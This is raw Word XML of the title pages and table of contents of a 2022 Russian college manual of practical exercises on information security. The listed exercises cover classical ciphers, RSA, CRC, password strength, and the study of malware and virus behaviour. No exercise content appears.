        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к практическим работам</w:t>
      </w:r>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> по дисциплине</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00E922C7" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E922C7">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> «</w:t>
      </w:r>
      <w:r w:rsidRPr="00523CE5">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Инженерно-технические средства физической защиты объектов информатизации</w:t>
      </w:r>
      <w:r w:rsidRPr="00E922C7">
        <w:rPr>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>для обучающихся по специальности</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="004F3AE5" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F3AE5">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>10.02.05 Обеспечение информационной безопасности автоматизированных систем</w:t>
      </w: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Pr="00AB771A" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251696640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2832735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>328295</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="809625" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="9525" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="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195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16CEF" id="Rectangle 171" o:spid="_x0000_s1026" style="position:absolute;margin-left:223.05pt;margin-top:25.85pt;width:63.75pt;height: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" strokecolor="white"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="004B5386">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ставрополь</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 2022 г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Настоящие методические указания составлены в соответствии с Федеральным государственным образовательным стандартом среднего </w:t>
      </w:r>
      <w:r w:rsidRPr="003E46EF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>профессионального образования по специальности 10.02.05 Обеспечение информационной безопасности автоматизированных систем утвержденным приказом Минобрнауки России от 09.12.2016г</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003E46EF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>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2C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="-144"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="8"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рекомендовано к использованию в учебном процессе Методическим советом СМК, протокол № 6 от 26.05.2022 г.</w:t>
      </w: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Default="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237"/>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003742AF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Содержание</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9258" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="0" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8522"/>
        <w:gridCol w:w="736"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Практическая работа № 1 Шифрование информации методом простой подстановки.……………………………………………….......</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 2 Шифрование информации методом «Решетки Кардано»…………………………...…………………………</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 3 Шифрование информации методом усложненной перестановки по таблице…..…………………….............</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 4 Шифрование информации методом</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:pStyle w:val="afa"/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>сложной подстановки………………..………………………………….</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 5 Шифрование информации методом «Линейного регистра с обратными связями»………………………….</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 6 Изучение CRC……………………………..</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36</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 7 Изучение алгоритма шифрования RSA…</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40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidTr="00D20130">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:left="-14"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Практическая работа № 8 Количественная оценка стойкости парольной защиты……………………………………………………….</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 </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002C1237" w:rsidRPr="003742AF" w:rsidRDefault="002C1237" w:rsidP="00D20130">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003742AF">
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>43</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="002C1237" w:rsidRPr="00C5462E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00C5462E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc3811329" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 9. Исследование типов вредоносного ПО</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811329 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</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30" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 10. Пути заражения ПК вредоносным ПО</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811330 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>54</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31" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 11.  Изучение форм проявления компьютерных вирусов</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811331 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>60</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32" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 12.  Изучение работы COM-вируса</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811332 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>63</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33" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 13. Изучение работы вируса, замещающего программный код</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811333 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>66</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34" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 14. Профилактика проникновения вредоносного программного обеспечения посредством исследования Реестра ОС Windows</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811334 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>71</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35" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 15. Профилактика проникновения вредоносного программного обеспечения посредством организации защиты от макровирусов средствами Microsoft Word</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc3811335 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>77</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36" w:history="1">
        <w:r w:rsidRPr="00CB1600">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Практическое занятие 16. Исследование уязвимостей Интернет браузеров в контексте новых веб технологий</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
